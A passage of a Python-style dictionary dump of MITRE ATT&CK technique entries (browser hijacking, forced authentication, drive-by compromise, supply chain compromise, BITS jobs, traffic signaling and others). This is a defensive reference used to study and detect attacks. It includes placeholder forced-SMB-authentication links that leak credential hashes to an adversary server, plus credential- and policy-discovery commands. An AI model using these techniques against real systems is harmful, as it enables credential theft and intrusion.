                          'the mobile configuration file to silently install additional extensions.\n'
                          '\n'
                          'Previous to macOS 11, adversaries could silently install browser extensions via the command '
                          'line using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> '
                          'files. In macOS 11+, the use of the <code>profiles</code> tool can no longer install '
                          'configuration profiles, however <code>.mobileconfig</code> files can be planted and '
                          'installed with user interaction.(Citation: xorrior chrome extensions macOS)\n'
                          '\n'
                          'Once the extension is installed, it can browse to websites in the background, steal all '
                          'information that a user enters into a browser (including credentials), and be used as an '
                          'installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: '
                          'ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: '
                          'Catch All Chrome Extension)\n'
                          '\n'
                          'There have also been instances of botnets using a persistent backdoor through malicious '
                          'Chrome extensions for [Command and '
                          'Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: '
                          'Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser '
                          'permissions and components, privacy settings, and other security controls for [Defense '
                          'Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: '
                          'Browser Adrozek) ',
           'name': 'Browser Extensions',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1185': {'attack_id': 'T1185',
           'categories': ['collection'],
           'description': 'Adversaries may take advantage of security vulnerabilities and inherent functionality in '
                          'browser software to change content, modify user-behaviors, and intercept information as '
                          'part of various browser session hijacking techniques.(Citation: Wikipedia Man in the '
                          'Browser)\n'
                          '\n'
                          'A specific example is when an adversary injects software into a browser that allows them to '
                          'inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser '
                          'as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser '
                          'Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as '
                          'pivoting may require specific process permissions, such as <code>SeDebugPrivilege</code> '
                          'and/or high-integrity/administrator rights.\n'
                          '\n'
                          "Another example involves pivoting browser traffic from the adversary's browser through the "
                          "user's browser by setting up a proxy which will redirect web traffic. This does not alter "
                          "the user's traffic in any way, and the proxy connection can be severed as soon as the "
                          'browser is closed. The adversary assumes the security context of whichever browser process '
                          'the proxy is injected into. Browsers typically create a new process for each tab that is '
                          'opened and permissions and certificates are separated accordingly. With these permissions, '
                          'an adversary could potentially browse to any resource on an intranet, such as '
                          '[Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible '
                          'through the browser and which the browser has sufficient permissions. Browser pivoting may '
                          'also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)',
           'name': 'Browser Session Hijacking',
           'platforms': ['Windows']},
 'T1187': {'attack_id': 'T1187',
           'categories': ['credential-access'],
           'description': 'Adversaries may gather credential material by invoking or forcing a user to automatically '
                          'provide authentication information through a mechanism in which they can intercept.\n'
                          '\n'
                          'The Server Message Block (SMB) protocol is commonly used in Windows networks for '
                          'authentication and communication between systems for access to resources and file sharing. '
                          'When a Windows system attempts to connect to an SMB resource it will automatically attempt '
                          'to authenticate and send credential information for the current user to the remote system. '
                          '(Citation: Wikipedia Server Message Block) This behavior is typical in enterprise '
                          'environments so that users do not need to enter credentials to access network resources.\n'
                          '\n'
                          'Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems '
                          'as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will '
                          'typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) '
                          '(Citation: Microsoft Managing WebDAV Security)\n'
                          '\n'
                          'Adversaries may take advantage of this behavior to gain access to user account hashes '
                          'through forced SMB/WebDAV authentication. An adversary can send an attachment to a user '
                          'through spearphishing that contains a resource link to an external server controlled by the '
                          'adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place '
                          'a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed '
                          "on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's "
                          'system accesses the untrusted resource it will attempt authentication and send information, '
                          "including the user's hashed credentials, over SMB to the adversary controlled server. "
                          '(Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform '
                          'off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access '
                          'to plaintext credentials. (Citation: Cylance Redirect to SMB)\n'
                          '\n'
                          'There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) '
                          'Some specifics from in-the-wild use include:\n'
                          '\n'
                          '* A spearphishing attachment containing a document with a resource that is automatically '
                          'loaded when the document is opened (i.e. [Template '
                          'Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for '
                          'example, a request similar to <code>file[:]//[remote address]/Normal.dotm</code> to trigger '
                          'the SMB request. (Citation: US-CERT APT Energy Oct 2017)\n'
                          '* A modified .LNK or .SCF file with the icon filename pointing to an external reference '
                          'such as <code>\\\\[remote address]\\pic.png</code> that will force the system to load the '
                          'resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT '
                          'Energy Oct 2017)',
           'name': 'Forced Authentication',
           'platforms': ['Windows']},
 'T1189': {'attack_id': 'T1189',
           'categories': ['initial-access'],
           'description': 'Adversaries may gain access to a system through a user visiting a website over the normal '
                          "course of browsing. With this technique, the user's web browser is typically targeted for "
                          'exploitation, but adversaries may also use compromised websites for non-exploitation '
                          'behavior such as acquiring [Application Access '
                          'Token](https://attack.mitre.org/techniques/T1550/001).\n'
                          '\n'
                          'Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by '
                          'Target](https://attack.mitre.org/techniques/T1608/004)), including:\n'
                          '\n'
                          '* A legitimate website is compromised where adversaries have injected some form of '
                          'malicious code such as JavaScript, iFrames, and cross-site scripting\n'
                          '* Script files served to a legitimate website from a publicly writeable cloud storage '
                          'bucket are modified by an adversary\n'
                          '* Malicious ads are paid for and served through legitimate ad providers (i.e., '
                          '[Malvertising](https://attack.mitre.org/techniques/T1583/008))\n'
                          '* Built-in web application interfaces are leveraged for the insertion of any other kind of '
                          'object that can be used to display web content or contain a script that executes on the '
                          'visiting client (e.g. forum posts, comments, and other user controllable web content).\n'
                          '\n'
                          'Often the website used by an adversary is one visited by a specific community, such as '
                          'government, a particular industry, or region, where the goal is to compromise a specific '
                          'user or set of users based on a shared interest. This kind of targeted campaign is often '
                          'referred to a strategic web compromise or watering hole attack. There are several known '
                          'examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n'
                          '\n'
                          'Typical drive-by compromise process:\n'
                          '\n'
                          '1. A user visits a website that is used to host the adversary controlled content.\n'
                          '2. Scripts automatically execute, typically searching versions of the browser and plugins '
                          'for a potentially vulnerable version. \n'
                          '    * The user may be required to assist in this process by enabling scripting or active '
                          'website components and ignoring warning dialog boxes.\n'
                          '3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n'
                          '4. If exploitation is successful, then it will give the adversary code execution on the '
                          "user's system unless other protections are in place.\n"
                          '    * In some cases a second visit to the website after the initial scan is required before '
                          'exploit code is delivered.\n'
                          '\n'
                          'Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the '
                          'focus of this technique is to exploit software on a client endpoint upon visiting a '
                          'website. This will commonly give an adversary access to systems on the internal network '
                          'instead of external systems that may be in a DMZ.\n'
                          '\n'
                          'Adversaries may also use compromised websites to deliver a user to a malicious application '
                          'designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, '
                          'like OAuth tokens, to gain access to protected applications and information. These '
                          'malicious applications have been delivered through popups on legitimate websites.(Citation: '
                          'Volexity OceanLotus Nov 2017)',
           'name': 'Drive-by Compromise',
           'platforms': ['Windows', 'Linux', 'macOS', 'SaaS']},
 'T1190': {'attack_id': 'T1190',
           'categories': ['initial-access'],
           'description': 'Adversaries may attempt to exploit a weakness in an Internet-facing host or system to '
                          'initially access a network. The weakness in the system can be a software bug, a temporary '
                          'glitch, or a misconfiguration.\n'
                          '\n'
                          'Exploited applications are often websites/web servers, but can also include databases (like '
                          'SQL), standard services (like SMB or SSH), network device administration and management '
                          'protocols (like SNMP and Smart Install), and any other system with Internet accessible open '
                          'sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: '
                          'US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device '
                          'Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also '
                          'involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or '
                          '[Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).\n'
                          '\n'
                          'If an application is hosted on cloud-based infrastructure and/or is containerized, then '
                          'exploiting it may lead to compromise of the underlying instance or container. This can '
                          'allow an adversary a path to access the cloud or container APIs, exploit container host '
                          'access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage '
                          'of weak identity and access management policies.\n'
                          '\n'
                          'Adversaries may also exploit edge network infrastructure and related appliances, '
                          'specifically targeting devices that do not support robust host-based defenses.(Citation: '
                          'Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n'
                          '\n'
                          'For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common '
                          'web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)',
           'name': 'Exploit Public-Facing Application',
           'platforms': ['Windows', 'IaaS', 'Network', 'Linux', 'macOS', 'Containers']},
 'T1195': {'attack_id': 'T1195',
           'categories': ['initial-access'],
           'description': 'Adversaries may manipulate products or product delivery mechanisms prior to receipt by a '
                          'final consumer for the purpose of data or system compromise.\n'
                          '\n'
                          'Supply chain compromise can take place at any stage of the supply chain including:\n'
                          '\n'
                          '* Manipulation of development tools\n'
                          '* Manipulation of a development environment\n'
                          '* Manipulation of source code repositories (public or private)\n'
                          '* Manipulation of source code in open-source dependencies\n'
                          '* Manipulation of software update/distribution mechanisms\n'
                          '* Compromised/infected system images (multiple cases of removable media infected at the '
                          'factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware) \n'
                          '* Replacement of legitimate software with modified versions\n'
                          '* Sales of modified/counterfeit products to legitimate distributors\n'
                          '* Shipment interdiction\n'
                          '\n'
                          'While supply chain compromise can impact any component of hardware or software, adversaries '
                          'looking to gain execution have often focused on malicious additions to legitimate software '
                          'in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: '
                          'Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a '
                          'desired victim set or malicious software may be distributed to a broad set of consumers but '
                          'only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept '
                          '2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source '
                          'projects that are used as dependencies in many applications may also be targeted as a means '
                          'to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)',
           'name': 'Supply Chain Compromise',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1195.001': {'attack_id': 'T1195.001',
               'categories': ['initial-access'],
               'description': 'Adversaries may manipulate software dependencies and development tools prior to receipt '
                              'by a final consumer for the purpose of data or system compromise. Applications often '
                              'depend on external software to function properly. Popular open source projects that are '
                              'used as dependencies in many applications may be targeted as a means to add malicious '
                              'code to users of the dependency.(Citation: Trendmicro NPM Compromise)  \n'
                              '\n'
                              'Targeting may be specific to a desired victim set or may be distributed to a broad set '
                              'of consumers but only move on to additional tactics on specific victims. ',
               'name': 'Compromise Software Dependencies and Development Tools',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1195.002': {'attack_id': 'T1195.002',
               'categories': ['initial-access'],
               'description': 'Adversaries may manipulate application software prior to receipt by a final consumer '
                              'for the purpose of data or system compromise. Supply chain compromise of software can '
                              'take place in a number of ways, including manipulation of the application source code, '
                              'manipulation of the update/distribution mechanism for that software, or replacing '
                              'compiled releases with a modified version.\n'
                              '\n'
                              'Targeting may be specific to a desired victim set or may be distributed to a broad set '
                              'of consumers but only move on to additional tactics on specific victims.(Citation: '
                              'Avast CCleaner3 2018)(Citation: Command Five SK 2011)  ',
               'name': 'Compromise Software Supply Chain',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1195.003': {'attack_id': 'T1195.003',
               'categories': ['initial-access'],
               'description': 'Adversaries may manipulate hardware components in products prior to receipt by a final '
                              'consumer for the purpose of data or system compromise. By modifying hardware or '
                              'firmware in the supply chain, adversaries can insert a backdoor into consumer networks '
                              'that may be difficult to detect and give the adversary a high degree of control over '
                              'the system. Hardware backdoors may be inserted into various devices, such as servers, '
                              'workstations, network infrastructure, or peripherals.',
               'name': 'Compromise Hardware Supply Chain',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1197': {'attack_id': 'T1197',
           'categories': ['defense-evasion', 'persistence'],
           'description': 'Adversaries may abuse BITS jobs to persistently execute code and perform various background '
                          'tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, '
                          'asynchronous file transfer mechanism exposed through [Component Object '
                          'Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft '
                          'COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other '
                          'applications preferred to operate in the background (using available idle bandwidth) '
                          'without interrupting other networked applications. File transfer tasks are implemented as '
                          'BITS jobs, which contain a queue of one or more file operations.\n'
                          '\n'
                          'The interface to create and manage BITS jobs is accessible through '
                          '[PowerShell](https://attack.mitre.org/techniques/T1059/001) and the '
                          '[BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft '
                          'BITS)(Citation: Microsoft BITSAdmin)\n'
                          '\n'
                          'Adversaries may abuse BITS to download (e.g. [Ingress Tool '
                          'Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after '
                          'running malicious code (e.g. [Indicator '
                          'Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the '
                          'BITS job database, without new files or registry modifications, and often permitted by host '
                          'firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS '
                          'May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable '
                          'persistence by creating long-standing jobs (the default maximum lifetime is 90 days and '
                          'extendable) or invoking an arbitrary program when a job completes or errors (including '
                          'after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware '
                          'June 2016)\n'
                          '\n'
                          'BITS upload functionalities can also be used to perform [Exfiltration Over Alternative '
                          'Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)',
           'name': 'BITS Jobs',
           'platforms': ['Windows']},
 'T1199': {'attack_id': 'T1199',
           'categories': ['initial-access'],
           'description': 'Adversaries may breach or otherwise leverage organizations who have access to intended '
                          'victims. Access through trusted third party relationship abuses an existing connection that '
                          'may not be protected or receives less scrutiny than standard mechanisms of gaining access '
                          'to a network.\n'
                          '\n'
                          'Organizations often grant elevated access to second or third-party external providers in '
                          'order to allow them to manage internal systems as well as cloud-based environments. Some '
                          'examples of these relationships include IT services contractors, managed security '
                          'providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The '
                          "third-party provider's access may be intended to be limited to the infrastructure being "
                          'maintained, but may exist on the same network as the rest of the enterprise. As such, '
                          '[Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for '
                          'access to internal network systems may be compromised and used.(Citation: CISA IT Service '
                          'Providers)\n'
                          '\n'
                          'In Office 365 environments, organizations may grant Microsoft partners or resellers '
                          'delegated administrator permissions. By compromising a partner or reseller account, an '
                          'adversary may be able to leverage existing delegated administrator relationships or send '
                          'new delegated administrator offers to clients in order to gain administrative control over '
                          'the victim tenant.(Citation: Office 365 Delegated Administration)',
           'name': 'Trusted Relationship',
           'platforms': ['Windows', 'SaaS', 'IaaS', 'Linux', 'macOS', 'Office 365']},
 'T1200': {'attack_id': 'T1200',
           'categories': ['initial-access'],
           'description': 'Adversaries may introduce computer accessories, networking hardware, or other computing '
                          'devices into a system or network that can be used as a vector to gain access. Rather than '
                          'just connecting and distributing payloads via removable storage (i.e. [Replication Through '
                          'Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware '
                          'additions can be used to introduce new functionalities and/or features into a system that '
                          'can then be abused.\n'
                          '\n'
                          'While public references of usage by threat actors are scarce, many red teams/penetration '
                          'testers leverage hardware additions for initial access. Commercial and open source products '
                          'can be leveraged with capabilities such as passive network tapping, network traffic '
                          'modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), '
                          'keystroke injection, kernel memory reading via DMA, addition of new wireless access to an '
                          'existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov '
                          '2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)',
           'name': 'Hardware Additions',
           'platforms': ['Windows', 'Linux', 'macOS']},
 'T1201': {'attack_id': 'T1201',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to access detailed information about the password policy used '
                          'within an enterprise network or cloud environment. Password policies are a way to enforce '
                          'complex passwords that are difficult to guess or crack through [Brute '
                          'Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary '
                          'to create a list of common passwords and launch dictionary and/or brute force attacks which '
                          'adheres to the policy (e.g. if the minimum password length should be 8, then not trying '
                          "passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the "
                          'lockout is set to 6 as to not lock out accounts).\n'
                          '\n'
                          'Password policies can be set and discovered on Windows, Linux, and macOS systems via '
                          'various command shell utilities such as <code>net accounts (/domain)</code>, '
                          '<code>Get-ADDefaultDomainPasswordPolicy</code>, <code>chage -l <username></code>, <code>cat '
                          '/etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code> (Citation: '
                          'Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may '
                          'also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on '
                          'network devices to discover password policy information (e.g. <code>show aaa</code>, '
                          '<code>show aaa common-criteria policy all</code>).(Citation: US-CERT-TA18-106A)\n'
                          '\n'
                          'Password policies can be discovered in cloud environments using available APIs such as '
                          '<code>GetAccountPasswordPolicy</code> in AWS (Citation: AWS GetPasswordPolicy).',
           'name': 'Password Policy Discovery',
           'platforms': ['Windows', 'Linux', 'macOS', 'IaaS', 'Network']},
 'T1202': {'attack_id': 'T1202',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may abuse utilities that allow for command execution to bypass security '
                          'restrictions that limit the use of command-line interpreters. Various Windows utilities may '
                          'be used to execute commands, possibly without invoking '
                          '[cmd](https://attack.mitre.org/software/S0106). For example, '
                          '[Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant '
                          '(pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other '
                          'utilities may invoke the execution of programs and commands from a [Command and Scripting '
                          'Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. '
                          '(Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n'
                          '\n'
                          'Adversaries may abuse these features for [Defense '
                          'Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary '
                          'execution while subverting detections and/or mitigation controls (such as Group Policy) '
                          'that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file '
                          'extensions more commonly associated with malicious payloads.',
           'name': 'Indirect Command Execution',
           'platforms': ['Windows']},
 'T1203': {'attack_id': 'T1203',
           'categories': ['execution'],
           'description': 'Adversaries may exploit software vulnerabilities in client applications to execute code. '
                          'Vulnerabilities can exist in software due to unsecure coding practices that can lead to '
                          'unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through '
                          'targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most '
                          'valuable exploits to an offensive toolkit are those that can be used to obtain code '
                          'execution on a remote system because they can be used to gain access to that system. Users '
                          'will expect to see files related to the applications they commonly used to do work, so they '
                          'are a useful target for exploit research and development because of their high utility.\n'
                          '\n'
                          'Several types exist:\n'
                          '\n'
                          '### Browser-based Exploitation\n'
                          '\n'
                          'Web browsers are a common target through [Drive-by '
                          'Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing '
                          'Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised '
                          'through normal web browsing or from certain users being targeted by links in spearphishing '
                          'emails to adversary controlled sites used to exploit the web browser. These often do not '
                          'require an action by the user for the exploit to be executed.\n'
                          '\n'
                          '### Office Applications\n'
                          '\n'
                          'Common office and productivity applications such as Microsoft Office are also targeted '
                          'through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be '
                          'transmitted directly as attachments or through links to download them. These require the '
                          'user to open the document or file for the exploit to run.\n'
                          '\n'
                          '### Common Third-party Applications\n'
                          '\n'
                          'Other applications that are commonly seen or are part of the software deployed in a target '
                          'network may also be used for exploitation. Applications such as Adobe Reader and Flash, '
                          'which are common in enterprise environments, have been routinely targeted by adversaries '
                          'attempting to gain access to systems. Depending on the software and nature of the '
                          'vulnerability, some may be exploited in the browser or require the user to open a file. For '
                          'instance, some Flash exploits have been delivered as objects within Microsoft Office '
                          'documents.',
           'name': 'Exploitation for Client Execution',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1204': {'attack_id': 'T1204',
           'categories': ['execution'],
           'description': 'An adversary may rely upon specific actions by a user in order to gain execution. Users may '
                          'be subjected to social engineering to get them to execute malicious code by, for example, '
                          'opening a malicious document file or link. These user actions will typically be observed as '
                          'follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).\n'
                          '\n'
                          'While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly '
                          'after Initial Access it may occur at other phases of an intrusion, such as when an '
                          "adversary places a file in a shared directory or on a user's desktop hoping that a user "
                          'will click on it. This activity may also be seen shortly after [Internal '
                          'Spearphishing](https://attack.mitre.org/techniques/T1534).\n'
                          '\n'
                          'Adversaries may also deceive users into performing actions such as enabling [Remote Access '
                          'Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system '
                          'to the adversary; running malicious JavaScript in their browser, allowing adversaries to '
                          '[Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and '
                          'executing malware for [User '
                          'Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam '
                          '2023)(Citation: Krebs Discord Bookmarks 2023)\n'
                          '\n'
                          'For example, tech support scams can be facilitated through '
                          '[Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user '
                          'interaction. Adversaries can use a combination of these methods, such as spoofing and '
                          'promoting toll-free numbers or call centers that are used to direct victims to malicious '
                          'websites, to deliver and execute payloads containing malware or [Remote Access '
                          'Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)',
           'name': 'User Execution',
           'platforms': ['Linux', 'Windows', 'macOS', 'IaaS', 'Containers']},
 'T1204.001': {'attack_id': 'T1204.001',
               'categories': ['execution'],
               'description': 'An adversary may rely upon a user clicking a malicious link in order to gain execution. '
                              'Users may be subjected to social engineering to get them to click on a link that will '
                              'lead to code execution. This user action will typically be observed as follow-on '
                              'behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). '
                              'Clicking on a link may also lead to other execution techniques such as exploitation of '
                              'a browser or application vulnerability via [Exploitation for Client '
                              'Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to '
                              'download files that require execution via [Malicious '
                              'File](https://attack.mitre.org/techniques/T1204/002).',
               'name': 'Malicious Link',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1204.002': {'attack_id': 'T1204.002',
               'categories': ['execution'],
               'description': 'An adversary may rely upon a user opening a malicious file in order to gain execution. '
                              'Users may be subjected to social engineering to get them to open a file that will lead '
                              'to code execution. This user action will typically be observed as follow-on behavior '
                              'from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). '
                              'Adversaries may use several types of files that require a user to execute them, '
                              'including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n'
                              '\n'
                              'Adversaries may employ various forms of '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or '
                              'Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that '
                              'a user will open and successfully execute a malicious file. These methods may include '
                              'using a familiar naming convention and/or password protecting the file and supplying '
                              'instructions to a user on how to open it.(Citation: Password Protected Word Docs) \n'
                              '\n'
                              'While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs '
                              'shortly after Initial Access it may occur at other phases of an intrusion, such as when '
                              "an adversary places a file in a shared directory or on a user's desktop hoping that a "
                              'user will click on it. This activity may also be seen shortly after [Internal '
                              'Spearphishing](https://attack.mitre.org/techniques/T1534).',
               'name': 'Malicious File',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1204.003': {'attack_id': 'T1204.003',
               'categories': ['execution'],
               'description': 'Adversaries may rely on a user running a malicious image to facilitate execution. '
                              'Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) '
                              'Images, and Azure Images as well as popular container runtimes such as Docker can be '
                              'backdoored. Backdoored images may be uploaded to a public repository via [Upload '
                              'Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download '
                              'and deploy an instance or container from the image without realizing the image is '
                              'malicious, thus bypassing techniques that specifically achieve Initial Access. This can '
                              'lead to the execution of malicious code, such as code that executes cryptocurrency '
                              'mining, in the instance or container.(Citation: Summit Route Malicious AMIs)\n'
                              '\n'
                              'Adversaries may also name images a certain way to increase the chance of users '
                              'mistakenly deploying an instance or container from the image (ex: [Match Legitimate '
                              'Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua '
                              'Security Cloud Native Threat Report June 2021)',
               'name': 'Malicious Image',
               'platforms': ['IaaS', 'Containers']},
 'T1205': {'attack_id': 'T1205',
           'categories': ['defense-evasion', 'persistence', 'command-and-control'],
           'description': 'Adversaries may use traffic signaling to hide open ports or other malicious functionality '
                          'used for persistence or command and control. Traffic signaling involves the use of a magic '
                          'value or sequence that must be sent to a system to trigger a special response, such as '
                          'opening a closed port or executing a malicious task. This may take the form of sending a '
                          'series of packets with certain characteristics before a port will be opened that the '
                          'adversary can use for command and control. Usually this series of packets consists of '
                          'attempted connections to a predefined sequence of closed ports (i.e. [Port '
                          'Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, '
                          'specific strings, or other unique characteristics. After the sequence is completed, opening '
                          'a port may be accomplished by the host-based firewall, but could also be implemented by '
                          'custom software.\n'
                          '\n'
                          'Adversaries may also communicate with an already open port, but the service listening on '
                          'that port will only respond to commands or trigger other malicious functionality if passed '
                          'the appropriate magic value(s).\n'
                          '\n'
                          'The observation of the signal packets to trigger the communication can be conducted through '
                          'different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r '
                          '2002), is to use the libpcap libraries to sniff for the packets in question. Another method '
                          'leverages raw sockets, which enables the malware to use ports that are already open for use '
                          'by other programs.\n'
                          '\n'
                          'On network devices, adversaries may use crafted packets to enable [Network Device '
                          'Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services '
                          'offered by the device such as telnet.  Such signaling may also be used to open a closed '
                          'service port such as telnet, or to trigger module modification of malware implants on the '
                          'device, adding, removing, or changing malicious capabilities.  Adversaries may use crafted '
                          'packets to attempt to connect to one or more (open or closed) ports, but may also attempt '
                          'to connect to a router interface, broadcast, and network address IP on the same port in '
                          'order to achieve their goals and objectives.(Citation: Cisco Synful Knock '
                          'Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks)  '
                          'To enable this traffic signaling on embedded devices, adversaries must first achieve and '
                          'leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the '
                          'monolithic nature of the architecture.\n'
                          '\n'
                          'Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. '
                          'Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or '
                          'woken up, by sending a magic packet to it. Once the system is powered on, it may become a '
                          'target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic '
                          'Packet)',
           'name': 'Traffic Signaling',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1205.001': {'attack_id': 'T1205.001',
               'categories': ['defense-evasion', 'persistence', 'command-and-control'],
               'description': 'Adversaries may use port knocking to hide open ports used for persistence or command '
                              'and control. To enable a port, an adversary sends a series of attempted connections to '
                              'a predefined sequence of closed ports. After the sequence is completed, opening a port '
                              'is often accomplished by the host based firewall, but could also be implemented by '
                              'custom software.\n'
                              '\n'
                              'This technique has been observed both for the dynamic opening of a listening port as '
                              'well as the initiating of a connection to a listening server on a different system.\n'
                              '\n'
                              'The observation of the signal packets to trigger the communication can be conducted '
                              'through different methods. One means, originally implemented by Cd00r (Citation: '
                              'Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in '
                              'question. Another method leverages raw sockets, which enables the malware to use ports '
                              'that are already open for use by other programs.',
               'name': 'Port Knocking',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1205.002': {'attack_id': 'T1205.002',
               'categories': ['defense-evasion', 'persistence', 'command-and-control'],
               'description': 'Adversaries may attach filters to a network socket to monitor then activate backdoors '
                              'used for persistence or command and control. With elevated permissions, adversaries can '
                              'use features such as the `libpcap` library to open sockets and install filters to allow '
                              'or disallow certain types of data to come through the socket. The filter may apply to '
                              'all traffic passing through the specified network interface (or every interface if not '
                              'specified). When the network interface receives a packet matching the filter criteria, '
                              'additional actions can be triggered on the host, such as activation of a reverse '
                              'shell.\n'
                              '\n'
                              'To establish a connection, an adversary sends a crafted packet to the targeted host '
                              'that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) '
                              'Adversaries have used these socket filters to trigger the installation of implants, '
                              'conduct ping backs, and to invoke command shells. Communication with these socket '
                              'filters may also be used in conjunction with [Protocol '
